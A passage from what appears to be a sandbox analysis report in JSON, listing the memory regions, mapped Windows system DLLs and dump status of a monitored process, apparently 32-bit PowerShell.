"00:00:38.763", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000382-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_79", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_382", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:00:38.763", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000383-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_80", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_383", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:00:38.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_384", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:38.764", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000385-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_81", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_385", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:38.764", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_386", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:00:38.764", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000387-addr_0x0000000000390000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_82", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_387", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:00:38.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1940324352, "type": "region", "version": 1 }, "end_va": 1940701183, "entry_point": 1940584344, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_388", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1940324352, "timestamp": "00:00:38.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1940717568, "type": "region", "version": 1 }, "end_va": 1940975615, "entry_point": 1940905592, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_389", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1940717568, "timestamp": "00:00:38.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1941176320, "type": "region", "version": 1 }, "end_va": 1941209087, "entry_point": 1941184760, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_390", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1941176320, "timestamp": "00:00:38.771", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_391", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:38.830", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_392", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:38.830", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_393", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:00:38.830", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000394-addr_0x0000000000330000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_83", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_394", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:00:38.831", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000395-addr_0x0000000000410000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_84", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 5308415, "entry_point": 0, "filename": null, "id": "region_395", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:00:38.832", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000396-addr_0x0000000000540000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_85", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 6553599, "entry_point": 0, "filename": null, "id": "region_396", "name": "private_0x0000000000540000", "norm_filename": null, "region_type": "private_memory", "start_va": 5505024, "timestamp": "00:00:38.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958322175, "entry_point": 1958019072, "filename": "\\Windows\\SysWOW64\\mscoree.dll", "id": "region_397", "name": "mscoree.dll", "norm_filename": "c:\\windows\\syswow64\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:00:38.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1958346752, "type": "region", "version": 1 }, "end_va": 1958428671, "entry_point": 1958346752, "filename": "\\Windows\\SysWOW64\\atl.dll", "id": "region_398", "name": "atl.dll", "norm_filename": "c:\\windows\\syswow64\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1958346752, "timestamp": "00:00:38.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1963655168, "type": "region", "version": 1 }, "end_va": 1963704319, "entry_point": 1963659489, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_399", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1963655168, "timestamp": "00:00:38.859", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1963720704, "type": "region", "version": 1 }, "end_va": 1964113919, "entry_point": 1963828147, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_400", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1963720704, "timestamp": "00:00:38.860", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1964113920, "type": "region", "version": 1 }, "end_va": 1965162495, "entry_point": 1964226285, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_401", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1964113920, "timestamp": "00:00:38.860", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1965293568, "type": "region", "version": 1 }, "end_va": 1965395967, "entry_point": 1965312373, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_402", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1965293568, "timestamp": "00:00:38.861", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1966129151, "entry_point": 1965466738, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_403", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:00:38.861", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966497791, "entry_point": 1966240888, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_404", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:00:38.861", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1966866432, "type": "region", "version": 1 }, "end_va": 1967849471, "entry_point": 1966933353, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_405", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1966866432, "timestamp": "00:00:38.862", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1968046080, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1968137027, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_406", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1968046080, "timestamp": "00:00:38.862", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1968635904, "type": "region", "version": 1 }, "end_va": 1970061311, "entry_point": 1968945725, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_407", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1968635904, "timestamp": "00:00:38.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1983774720, "type": "region", "version": 1 }, "end_va": 1984360447, "entry_point": 1983791025, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_408", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1983774720, "timestamp": "00:00:38.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985675264, "type": "region", "version": 1 }, "end_va": 1986789375, "entry_point": 1985753811, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_409", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985675264, "timestamp": "00:00:38.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1987379200, "type": "region", "version": 1 }, "end_va": 1987420159, "entry_point": 1987393184, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_410", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1987379200, "timestamp": "00:00:38.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1987444736, "type": "region", "version": 1 }, "end_va": 1988100095, "entry_point": 1987529189, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_411", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1987444736, "timestamp": "00:00:38.865", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1991442432, "type": "region", "version": 1 }, "end_va": 1992085503, "entry_point": 1991655383, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_412", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1991442432, "timestamp": "00:00:38.865", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997537280, "type": "region", "version": 1 }, "end_va": 1997893631, "entry_point": 1997642662, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_413", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997537280, "timestamp": "00:00:38.865", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000414-addr_0x0000000077160000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_86", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 1997930496, "type": "region", "version": 1 }, "end_va": 1998954495, "entry_point": 0, "filename": null, "id": "region_414", "name": "private_0x0000000077160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1997930496, "timestamp": "00:00:38.866", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000415-addr_0x0000000077260000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_87", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1998979072, "type": "region", "version": 1 }, "end_va": 2000154623, "entry_point": 0, "filename": null, "id": "region_415", "name": "private_0x0000000077260000", "norm_filename": null, "region_type": "private_memory", "start_va": 1998979072, "timestamp": "00:00:38.866", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_416", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:38.866", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_417", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:38.867", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 8159231, "entry_point": 0, "filename": null, "id": "region_418", "name": "pagefile_0x0000000000640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6553600, "timestamp": "00:00:38.871", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1990197248, "type": "region", "version": 1 }, "end_va": 1991032831, "entry_point": 1990203019, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_419", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1990197248, "timestamp": "00:00:38.871", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1991049216, "type": "region", "version": 1 }, "end_va": 1991442431, "entry_point": 1991120271, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_420", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1991049216, "timestamp": "00:00:38.871", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_421", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:39.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_422", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:00:39.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 995327, "entry_point": 983040, "filename": "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_423", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:00:39.055", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000424-addr_0x0000000000100000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_88", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_424", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:39.063", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000425-addr_0x0000000000110000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_89", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_425", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:39.064", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000426-addr_0x00000000002e0000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_90", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3276799, "entry_point": 0, "filename": null, "id": "region_426", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:00:39.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8192000, "type": "region", "version": 1 }, "end_va": 9768959, "entry_point": 0, "filename": null, "id": "region_427", "name": "pagefile_0x00000000007d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8192000, "timestamp": "00:00:39.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9830400, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_428", "name": "pagefile_0x0000000000960000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9830400, "timestamp": "00:00:39.065", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000429-addr_0x0000000001d60000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_91", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 31850495, "entry_point": 0, "filename": null, "id": "region_429", "name": "private_0x0000000001d60000", "norm_filename": null, "region_type": "private_memory", "start_va": 30801920, "timestamp": "00:00:39.065", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000430-addr_0x0000000001f30000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_92", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32702464, "type": "region", "version": 1 }, "end_va": 32767999, "entry_point": 0, "filename": null, "id": "region_430", "name": "private_0x0000000001f30000", "norm_filename": null, "region_type": "private_memory", "start_va": 32702464, "timestamp": "00:00:39.065", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000431-addr_0x0000000002040000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_93", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 33816576, "type": "region", "version": 1 }, "end_va": 34078719, "entry_point": 0, "filename": null, "id": "region_431", "name": "private_0x0000000002040000", "norm_filename": null, "region_type": "private_memory", "start_va": 33816576, "timestamp": "00:00:39.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1938489344, "type": "region", "version": 1 }, "end_va": 1939013631, "entry_point": 1938569161, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_432", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1938489344, "timestamp": "00:00:39.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_433", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:00:39.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 33681407, "entry_point": 0, "filename": null, "id": "region_434", "name": "pagefile_0x0000000001f40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32768000, "timestamp": "00:00:39.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970614271, "entry_point": 1970086866, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_435", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:00:39.069", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1249279, "entry_point": 0, "filename": null, "id": "region_436", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:39.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1983750143, "entry_point": 1971394049, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_437", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:00:39.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1956970496, "type": "region", "version": 1 }, "end_va": 1957064703, "entry_point": 1956970496, "filename": 